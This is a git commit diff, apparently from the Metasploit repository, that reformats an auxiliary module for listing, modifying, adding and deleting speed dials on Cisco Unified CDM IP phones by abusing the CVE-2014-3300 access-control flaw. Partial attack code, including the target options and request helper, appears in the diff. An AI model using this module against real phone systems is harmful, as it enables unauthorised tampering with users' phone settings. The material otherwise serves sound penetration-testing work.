Minor beautification
jvazquez-r7
parent
1d0e9a2dca
commit
000d7dd1eb
|
|
@ -10,44 +10,35 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info={})
|
||||||
super(
|
super(update_info(info,
|
||||||
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
|
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
|
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
|
||||||
in Unified CDM Application Software before 10 does not properly implement access control,
|
in Unified CDM Application Software before 10 does not properly implement access control,
|
||||||
which allows remote attackers to modify user information. This vulnerability can be exploited
|
which allows remote attackers to modify user information. This vulnerability can be exploited
|
||||||
for unauthorised speeddial manipulation using this module. This tool can be tested with the fake
|
for unauthorised speeddial manipulation using this module. This tool can be tested with the fake
|
||||||
voss-xmlservice component of Viproy.
|
voss-xmlservice component of Viproy.
|
||||||
},
|
},
|
||||||
'Author' => 'fozavci',
|
'Author' => 'fozavci',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['CVE', '2014-3300'],
|
['CVE', '2014-3300'],
|
||||||
['BID', '68331']
|
['BID', '68331']
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Actions' =>
|
'Actions' =>
|
||||||
[
|
[
|
||||||
[ 'List', {
|
[ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],
|
||||||
'Description' => 'Getting the speeddials for the MAC address.'
|
[ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
|
||||||
} ],
|
[ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],
|
||||||
[ 'Modify', {
|
[ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
|
||||||
'Description' => 'Modifying a speeddial for the MAC address.'
|
],
|
||||||
} ],
|
|
||||||
[ 'Add', {
|
|
||||||
'Description' => 'Adding a speeddial for the MAC address.'
|
|
||||||
} ],
|
|
||||||
[ 'Delete', {
|
|
||||||
'Description' => 'Deleting a speeddial for the MAC address.'
|
|
||||||
} ]
|
|
||||||
],
|
|
||||||
'DefaultAction' => 'List'
|
'DefaultAction' => 'List'
|
||||||
)
|
))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80),
|
|
||||||
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
|
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
|
||||||
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
|
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
|
||||||
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
|
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
|
||||||
|
|
@ -122,10 +113,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
def send_rcv(uri)
|
def send_rcv(uri)
|
||||||
uri=normalize_uri(uri.to_s)
|
uri=normalize_uri(uri.to_s)
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
|
if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
|
||||||
return Exploit::CheckCode::Vulnerable,res
|
return Exploit::CheckCode::Vulnerable,res
|
||||||
else
|
else
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue